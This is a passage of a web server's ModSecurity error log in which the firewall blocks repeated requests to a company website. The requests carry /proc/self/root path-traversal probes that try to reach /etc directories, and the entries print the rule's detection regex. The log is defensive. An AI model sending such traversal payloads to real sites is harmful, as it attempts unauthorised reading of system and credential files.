"abp0i9a6ubjKNq_cu4ZrXAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:54.647020 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:41814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0jvu8EFLIOrSqIpvabgAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:57.063756 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:41824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0kew_le52K8_3pV213AAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:58.105323 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.241.31:54308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0kgkwaGbbGflqUZDmDAAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:46:59.517459 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.243.128:41840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0kymAPhZkrhU8w4lDOgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:47:00.831598 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:43260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0lMdf6f5d65gmYZSn4QAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:47:02.275019 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:43266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0luyqAr6etmhZHNqQ5wAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:47:08.141236 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.241.31:42282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0nCmAPhZkrhU8w4lDSQAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:47:10.345512 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.243.128:43276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0nuw_le52K8_3pV215QAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:47:26.995527 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:51846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0ruw_le52K8_3pV217QAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:47:28.327155 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:51854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0sNa6ubjKNq_cu4ZrawAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:47:31.730718 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:33698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0s0zinOy1jxa1j4foLQAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:47:33.022579 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:33700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0tew_le52K8_3pV217gAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:47:35.439169 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:33714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0t_u8EFLIOrSqIpvagwAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:47:37.335310 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.228.61:59154] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp0uPu8EFLIOrSqIpvaiAAAAks"]
[Wed Mar 18 06:47:38.466243 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:33720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0uvu8EFLIOrSqIpvaiwAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:47:38.927137 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.244.43:37794] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp0uvu8EFLIOrSqIpvajAAAAkY"]
[Wed Mar 18 06:47:39.778977 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:56182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0uwkwaGbbGflqUZDmFQAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:47:41.062104 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:56186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0veoXxyEfFpUF8f9CRgAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:47:42.314785 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:56196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0vta6ubjKNq_cu4ZrdAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:47:44.743815 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:56208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0wOyqAr6etmhZHNqQ-QAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:47:49.218979 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:42384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0xcdf6f5d65gmYZSoEQAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:47:50.237871 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:56212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0xkzinOy1jxa1j4foNgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:47:55.393279 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:41682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0ygkwaGbbGflqUZDmIwAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:47:57.488423 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:41696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0zCmAPhZkrhU8w4lDUgAAAJU"], referer: 